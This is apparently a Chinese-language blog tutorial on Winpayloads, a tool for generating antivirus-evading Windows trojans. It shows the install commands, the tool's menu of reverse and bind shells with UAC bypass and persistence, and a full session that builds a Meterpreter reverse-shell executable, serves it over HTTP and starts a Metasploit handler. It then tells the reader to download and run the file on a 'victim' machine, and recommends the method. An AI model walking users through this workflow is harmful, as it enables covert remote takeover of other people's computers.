制作免杀windows木马(Winpayloads )

工具链接

https://github.com/nccgroup/Winpayloads

简介

Winpayloads 是一款制作免杀windows木马的工具

安装

下载
git clone https://github.com/nccgroup/Winpayloads.git
cd Winpayloads
安装
chmod +x setup.sh
./setup.sh
安装完后启动的样子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


_ ___ ____ __ __
| | / (_)___ / __ \____ ___ __/ /___ ____ _____/ /____
| | /| / / / __ \/ /_/ / __ `/ / / / / __ \/ __ `/ __ / ___/
| |/ |/ / / / / / ____/ /_/ / /_/ / / /_/ / /_/ / /_/ (__ )
|__/|__/_/_/ /_/_/ \__,_/\__, /_/\____/\__,_/\__,_/____/
/____/NCCGroup - CharlieDean
===================================================================================================================================Main Menu==================================================================================================================================
1: Windows Reverse Shell
2: Windows Meterpreter Reverse Shell [uacbypass, persistence, allchecks]
3: Windows Meterpreter Bind Shell [uacbypass, persistence, allchecks]
4: Windows Meterpreter Reverse HTTPS [uacbypass, persistence, allchecks]
5: Windows Meterpreter Reverse Dns [uacbypass, persistence, allchecks]
ps: PowerShell Menu
stager: Powershell Interpreter Stager
clients: Connected Interpreter Clients

?: Print Detailed Help
back: Main Menu
exit: Exit
==============================================================================================================================================================================================================================================================================
Main Menu >

使用

比如你要生成一个Windows Meterpreter Reverse Shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
Main Menu > 2

[*] Press Enter For Default Port(4444)
[*] Port> 4444

[*] Press Enter To Get Local Ip Automatically(1.1.1.16)
[*] IP>
[*] IP SET AS 1.1.1.16
[*] PORT SET AS 4444

[*] Try UAC Bypass(Only Works For Local Admin Account)? y/[n]:y
[*] Creating Payload using Pyinstaller...
- Genera
[*] Payload.exe Has Been Generated And Is Located Here: /root/winpayloads/Windows_Meterpreter_Reverse_Shell.exe

[*] Upload To Local Websever or (p)sexec? [y]/p/n: y

[*] Serving Payload On http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe

_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\


=[ metasploit v4.14.27-dev ]
+ -- --=[ 1659 exploits - 951 auxiliary - 293 post ]
+ -- --=[ 486 payloads - 40 encoders - 9 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

payload => windows/meterpreter/reverse_tcp
LPORT => 4444
LHOST => 0.0.0.0
autorunscript => multi_console_command -rc uacbypass.rc
ExitOnSession => false
[*] Exploit running as background job.

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
msf exploit(handler) >

在受害者机器上打开 http://1.1.1.16:8000/Windows_Meterpreter_Reverse_Shell.exe,之后运行就可以了

评价

其实不能做到完全免杀,可能是因为工具出来太久的缘故,但是生成木马的方式还是挺简单的值得一试

欢迎关注我的其它发布渠道